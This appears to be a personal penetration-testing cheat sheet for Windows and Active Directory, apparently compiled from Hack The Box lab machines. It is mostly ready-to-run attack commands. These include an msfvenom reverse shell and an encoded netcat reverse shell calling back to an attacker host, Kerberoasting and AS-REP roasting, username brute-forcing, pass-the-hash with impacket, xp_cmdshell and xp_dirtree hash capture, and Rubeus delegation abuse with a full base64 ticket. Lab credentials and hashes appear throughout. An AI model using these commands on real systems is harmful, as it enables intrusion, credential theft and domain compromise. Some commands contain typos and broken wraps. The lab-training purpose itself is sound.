Windows checklist

before shell

Reverse shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f exe -o reverse.exe

make the reverse shell encoded in base64

echo 'cmd /c "\\10.10.14.6\share\nc64.exe -e cmd 10.10.14.6 443"' | iconv -f ascii -t utf-16le | base64 -w0

powershell /enc <payload>

Userenum
When we have the smb creds but can't do anything: | Flight
we can get the sid of the users:

impacket-lookupsid flight.htb/svc_apache:'S@Ss!K@*t13'@flight.htb

Just start bruteforcing with kerbrute

SMB
When multiple ports start with smb:

smbmap -H 10.10.10.161

Access the pipes

smbclient --no-pass //<IP>/<Folder>

Use when NTLM auth is disabled: | scrambled

impacket-smbclient -k -no-pass scrm.local/ksimpson:[email protected]

When we have the smb creds but can't do anything: | Flight

we can get the sid of the users:

impacket-lookupsid flight.htb/svc_apache:'S@Ss!K@*t13'@flight.htb

Ldap
Basic search

ldapsearch -x -H ldap://10.10.10.161 -D "" -w "" -b 'DC=timelapse,DC=htb0'

 ldapsearch -x -H ldap://10.10.10.175 -D '' -w '' -b 'DC=EGOTISTICAL-BANK,DC=LOCAL' > ldap_output

cat ldap_output | grep -i userprincipalname | cut -d " " -f 2 > User_p_names.txt

SAM account name:

ldapsearch -H ldap://10.10.10.161 -x -b DC=htb,DC=local "(objectClass=person)" | grep -i samaccountname

asrep-roast

impacket-GetNPUsers -dc-ip 10.10.10.161 -usersfile users.txt htb.local/

start with the basic enum:

ldapsearch -x -H ldap://10.10.11.158 -s base

ldapsearch -x -H ldap://10.10.11.24 -s base namingcontents

and:

ldapsearch -h 10.10.10.248 -x -s base namingcontexts

Change the scopes:1. base 2. sub 3. children

ldapsearch -x -H ldap://10.10.10.161 -s base -b 'DC=htb,DC=local'

ldapsearch -x -H ldap://10.10.10.161 -D '' -w '' -b "DC=htb,DC=local"

batcat test.txt | grep -i userprincipalname | cut -d ":" -f 2 > u.txt

LDAP nmap

nmap -n -sV --script "ldap* and not brute" 10.10.11.168

usernames

Look for legacy password also : | Cascade

Just search for pwd

Nmap
get the userinfo without users list

nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='streamIO.htb'" 10.10.11.158

with username:

nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='streamIO.htb',userdb=users.txt

10.10.11.158
Kerberoasting
original article
Kerberoasting is a post-exploitation attack technique that attempts to obtain a password hash of
an Active Directory account that has a Service Principal Name (“SPN”).

In such an attack, an authenticated domain user requests a Kerberos ticket for an SPN. The
retrieved Kerberos ticket is encrypted with the hash of the service account password affiliated
with the SPN. (An SPN is an attribute that ties a service to a user account within the AD). The
adversary then works offline to crack the password hash, often using brute force techniques.

Step1
Get the service and user principal names

impacket-get

Step2
Dump the hashes:

kerbrute userenum --dc <ip> -d <domain.name> <wordlist of users>

NOTE: when crackingthe hash , look for the version if the hashcat can crack it or not , look at
the prefix form the list by googling : hashcat example hashes {as-rep uses 23}
we can also downgrade it via:

kerbrute userenum --dc <ip> -d <domain.name> <wordlist of users> --downgrade

OR
using impacket:

impacket-GetNPUsers -userfile <wordlist of users> -dc-ip <ip> <domain.name>/

Step3

impacket-GetUserSPNs <domain.local>/<username>:<password> -dc-ip <ip> -request

we get another hash from it:

crackmapexc smb <ip> -u "<username from hash>" -p <password from hash cracked>

verify that it works then dump the shares:

crackmapexec smb <ip> -u "<username from hash>" -p <password from hash cracked>

NOTE Try brutefocing from seclists maybe we can find some valid usernames | manager

kerbrute userenum --dc 10.10.11.236 -d manager.htb /usr/share/wordlists/seclists/Usernames/xato-net-10-

million-usernames.txt
ASREP-Roasting
impacket-GetNPUsers EGOTISTICAL-BANK.LOCAL/ -dc-ip 10.10.10.175 -usersfile users -o hash

Always try to use the userfile , maybe hit something | sauna

kerbrute userenum -d EGOTISTICAL-BANK.LOCAL /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt

--dc 10.10.10.175

Bloodhound from outside

There are scenarios where we have the creds but now being applied anywhere , so it could be a
sign that we may have to try enumerating with bloodhound . | Intelligence

bloodhound-python -c ALL -u Ted.Graves -p Mr.Teddy -dc intelligence.htb -d intelligence.htb -ns 10.10.10.248

Web
On dirbrtfrc : make sure to add extensions also: | bounty

gobuster dir -u http://10.10.10.93/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-

2.3-medium.txt -x .aspx .asp .txt .ht
ml -t 50

Grab the hash and pass:

or

impacket-wmiexec -hashes '365ca60e4aba3e9a71d78a3912caf35c:823452073d75b9d1cf70ebdf86c7f98e' -dc-ip

10.10.10.175 [email protected]

or

impacket-psexec [email protected] -hashes

365ca60e4aba3e9a71d78a3912caf35c:823452073d75b9d1cf70ebdf86c7f98e

Whenever see LFI -> always go for smbshare and grab the hash | pov

impacket-smbserver share -smb2support /home/bali/htb/pov

Generating NTLM hash

iconv -f ASCII -t UTF-16LE <(printf "Pegasus60") | openssl dgst -md4

Get SID of domain:

impacket-getPac -targetUser administrator scrm.local/ksimpson:ksimpson

Hash Cracking

Crackmapexec
check creds | timelapse

crackmapexec smb 10.10.11.152 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV'

SMB

crackmapexec smb 10.10.10.161 -u 'username' -p 'password'

LDAP

crackmapexec ldap 10.10.10.161 -u svc-alfresco -p 's3rvice'

command execution

SMB

crackmapexec smb 10.10.10.161 -u svc-alfresco -p 's3rvice' -x "whoami"

winrm

crackmapexec winrm 10.10.10.161 -u svc-alfresco -p 's3rvice' -x "whoami"

evil winrm
 evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice

DNS
AFXR {domain dump}

dig axfr @10.10.10.175 egotistical-bank.local

method Silver ticket:

python getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>

get NTLM from google {just pass the name}

then do klist
install klist via:

apt-get install heimdal-clients

also do:

export KRB5CCNAME=/home/akshad/hack-the-box/retired-machines/windows-box/Scrambled/ksimpson.ccache
or use:

also do:

impacket-smbclient -k -no-pass scrm.local/ksimpson:[email protected]

Mssql
connect:

impacket-mssqlclient -windows-auth manager.htb/operator:[email protected]

Exec
this is the exec function in mssql which can exectue the commands
before executing this one make sure that you have the smb share ready on your pc:

impacket-smbserver share -smb2support /tmp/

exec xp_dirtree \\<your-ip>\share , 1, 1

list diretories:

EXEC xp_dirtree 'C:\inetpub\wwwroot', 1, 1;

to execute command: | scrambled

enable_xp_cmdshell

RECONFIGURE

Basic commands:
1. List Databases:
 MySQL: SHOW DATABASES;

MSSQL: SELECT name FROM master.sys.databases;

2. List Tables:
MySQL: SHOW TABLES;

MSSQL: SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE';

3. Use Database:
MySQL: USE database_name;

MSSQL: USE database_name;

check: mssql

Check the current user privilege in mssql

SELECT entity_name, permission_name FROM fn_my_permissions(NULL, 'SERVER');

Always check for linked servers , they might have some info there: | poo

select srvname from sysservers;

we can use openquery to run the query on other linked servers via:

EXECUTE ('select suser_name();') at [COMPATIBILITY\POO_CONFIG];

find sysadmin in mssql:

SELECT name FROM master..syslogins WHERE sysadmin = '1'

Kerberos delegations abuse:

If you have compromised a user account or a computer (machine account) that has kerberos
constrained delegation enabled, it's possible to impersonate any domain user (including
administrator) and authenticate to a service that the user account is trusted to delegate to.
BEST ARTICLE UP TILL NOW I READ : abuse_kerberos_from_linux | HTB: Intelligence

From Outside | Intelligence

We need:

1. SPN {can get from bloodhound or mentioned above.}

2. Hash {refer: Intelligence}

3. DC ip

4. whom to impersonate

impacket-getST -dc-ip 10.10.10.248 -spn www/dc.intelligence.htb -hashes :5e47bac787e5e1970cf9acdb5b316239 -

impersonate administrator intelligence.htb/svc_int
we had to sync time with the server after the error:

KRB_AP_ERR_SKEW(Clock skew too great)

with ntpdate

ntpdate 10.10.10.248

if in virtualbox use first then ntpdate:

sudo service virtualbox-guest-utils stop

From Inside
User Account
Prerequisites
Hunting for user accounts that have kerberos constrained delegation enabled:

Get-NetUser -TrustedToAuth

In the below screenshot, the user spot is allowed to delegate or in other words, impersonate any
user and authenticate to a file system service (CIFS) on a domain controller DC01.
NOTE:
User has to have an attribute TRUSTED_TO_AUTH_FOR_DELEGATION in order for it to be able to
authenticate to the remote service.
Attribute msds-allowedtodelegateto identifies the SPNs of services the user spot is trusted to
delegate to (impersonate other domain users) and authenticate to - in this case, it's saying that
the user spot is allowed to authenticate to CIFS service on DC01 on behalf of any other domain
user:

Requesting delegation for TGT:

 Rubeus.exe tgtdeleg

Using rubeus, we can now request TGS for [email protected] , who will be allowed to
authenticate to CIFS/dc01.offense.local :
ticket is the base64 ticket we get with rubeus's tgtdeleg

Rubeus.exe s4u
/ticket:doIFCDCCBQSgAwIBBaEDAgEWooIEDjCCBAphggQGMIIEAqADAgEFoQ8bDU9GRkVOU0UuTE9DQUyiIjAgoAMCAQKhGTAXGwZrcmJ0
Z3QbDU9GRkVOU0UuTE9DQUyjggPEMIIDwKADAgESoQMCAQKiggOyBIIDro3ZCHDaVettnJseuyFJMK+Il4GAtWVAHPAq02cnHmOs3R2KcrOW
pf3YbtnTD7fB+rKdZ8aElgloJO+v4XVM2NgyOVIia0MzNToDrK1ynhC70aApbag+ykvUFTDeG9NjhE3TVk3+F99vWboy6hhc9AmRUJwHFuqL
C4djtL2PtQSpgWWL42W5eONlIZkc5XK0kWkC/AvivuuPOHs9aEy3g38hoBeApZE8NqT7mGKz5JHLwV5TyUgo87s6fFVSn8LHK8CI6G0x2DRh
xxu04q0qnRXhLJ5S0MyJgJj6YDVESvCUgep5MXR+OYp0EGdVP8qQJK+x6m4rmr0Y3nd1Klmc+xDnLSC11ay7I8VevqhCBCZ64c+HQow4qcMT
a/agxyOXqK42ynUl0GJtrLV7nIIrp+J2e5PECDUXIjKFkGnp6HZDNfzYAGL3XxyyT2JYdneOS3VUzJQyEctjuQMdVA0wB8NrRqDVdqSNBSOy
BwpB3/FWzdHNYxztRmVT+Yz6qJCU4SYHIzHUE5dqHjvhjPSwgAkhS/QNApxtWvyba8iwCSnyualuhK46LS0pkt1IIQT0Y+qw80oL6mzjD+rx
fKgR4B9hI6Imw9zTT5rjlRNMjWEy78izLtRB+ulzqdkZCUMA6zswWjq1BTmWzZX0LAZ+QAWQJPzoRVsqOcZCZwo/aWwmO1s9v5TLRRMLTAvk
16PQW3z9NHix2Io9sObH8cb7gVrB+u2Q545Qwekl0uwP5mCar6swU2oEkxBm5DZvLsbZTcGl+KzGxqq/zhEJm3EceLuwIY81z8aYu13c6AsY
ETs9VevdEVysylpNL7EcHu8iXsoE5JmLx7OrcPR9WfeFWxRDp+1CVDijOI5VOS51+JpkEvcXFmfZueqLTJ66VGJgQaP7A3B//Y40ur5nSXyv
EmIKgzdeqPLpGa5GPiNs/rYFmMlxwEX+yVFB5bPYgoszr3Crjsvs6Q/vdr36NoWqI9/11Nurzeeknt+k8sUV26URnQVkecW4yJFQ2TZwYCJ1
k9h4cr96csJ9HhJO46UBye/8oqlqJXKnYY3JpaZiXWK77kG7BqhM6oPl+oEIbX2ycj/gHesxREvP7/vYINk33KbOSxXTAi3Je3wbZP7N+3B9
Lz04m8Xi6nGeIVsZiMyODpnJVX5Bgq+3cGaSty0v+fIfqMHDwuKhOS7h1MGLJduhWh3b21ytDfzn73yyCPskFee2ckAomlAgxMzg8ZatmZDL
TxfUenJ+EnrJgkYee6OB5TCB4qADAgEAooHaBIHXfYHUMIHRoIHOMIHLMIHIoCswKaADAgESoSIEIN2JDvcjQZeMR+7giMsawE1vG/Cmw9IF
IV7ZYwaELMqaoQ8bDU9GRkVOU0UuTE9DQUyiETAPoAMCAQGhCDAGGwRzcG90owcDBQBgoQAApREYDzIwMTkwODE3MTMyMDU2WqYRGA8yMDE5
MDgxNzIzMDY0MFqnERgPMjAxOTA4MjQxMzA2NDBaqA8bDU9GRkVOU0UuTE9DQUypIjAgoAMCAQKhGTAXGwZrcmJ0Z3QbDU9GRkVOU0UuTE9D
QUw= /impersonateuser:administrator /domain:offense.local /msdsspn:cifs/dc01.offense.local
/dc:dc01.offense.local /ptt
We've got the impersonated TGS tickets for administrator account:

now when we do klist we can see we can access the domain resource:

dir \\dc01.offense.local\c$